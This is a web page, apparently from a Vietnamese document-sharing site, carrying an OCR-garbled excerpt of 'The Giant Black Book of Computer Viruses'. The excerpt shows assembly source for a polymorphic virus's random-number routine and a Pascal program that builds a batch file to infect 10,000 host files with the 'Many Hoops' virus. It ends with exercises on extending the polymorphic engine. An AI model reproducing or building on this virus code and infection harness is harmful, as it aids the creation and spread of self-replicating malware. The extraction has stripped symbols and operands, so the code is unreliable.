tailieunhanh - the giant black book of computer viruses phần 8

các phân đoạn được định nghĩa để tạo thành một loại từ ngữ quan trọng nhất của bộ nhớ. Địa chỉ vật lý được tìm thấy bằng cách dùng 16 lần so với phân khúc cộng với bù đắp. Trong chế độ bảo vệ 80386, phân đoạn được xác định bởi một bảng mô tả, | Polymorphic Viruses 465 Create a pseudo-random number and put it in ax. GET_RANDOM PROC NEAR push bx push cx push dx call GR1 GR1 pop bx sub bx OFFSET GR1 mov eax bx RAND_SEED mov ecx bx A mul ecx add eax bx C adc edx 0 mov ecx bx M div ecx mov eax edx mov bx RAND_SEED eax pop dx pop cx pop bx retn GET_RANDOM ENDP END multiply add divide remainder in ax and save for next round Testing the Many Hoops If you want to generate 10 000 instances of an infection with the Many Hoops for testing purposes the following Turbo Pascal program will create a batch file to do the job. Watch out though putting 10 000 files in one directory will slow your machine down incredibly. You may want to modify it to generate only 1 000 files instead. To use the batch file you ll need and in a directory along with along with at least 25 megabytes of disk space. Installing SMARTDRV will save lots of time. is as follows program gen_10000 Generate batch file to create 10000 hosts and infect them var s n string bf text j word begin assign bf rewrite bf writeln bf md 10000 writeln bf cd 10000 for j 1 to 10000 do begin str j n while length n 5 do n 0 n writeln bf copy . n .com 466 The Giant Black Book of Computer Viruses end writeln bf md inf writeln bf . manyhoop for j 2 to 10000 do begin str j-1 n while length n 5 do n 0 n writeln bf n writeln bf copy n .com inf writeln bf del n .com end writeln bf copy inf writeln bf del close bf end. And the file looks like this .model tiny .code The host program starts here. This one is a dummy that just returns control to DOS. ORG 100H HOST db 100 dup 90H mov ax 4C00H HOST_END int 21H END HOST Terminate error code 0 Exercises 1. Add one new class 3 instruction which modifies one register to the RAND_INSTR routine. 2. Add one new class 4 instruction which modifies two registers to the RAND_INSTR routine. 3. Add memory-based polymorphism to a memory

TỪ KHÓA LIÊN QUAN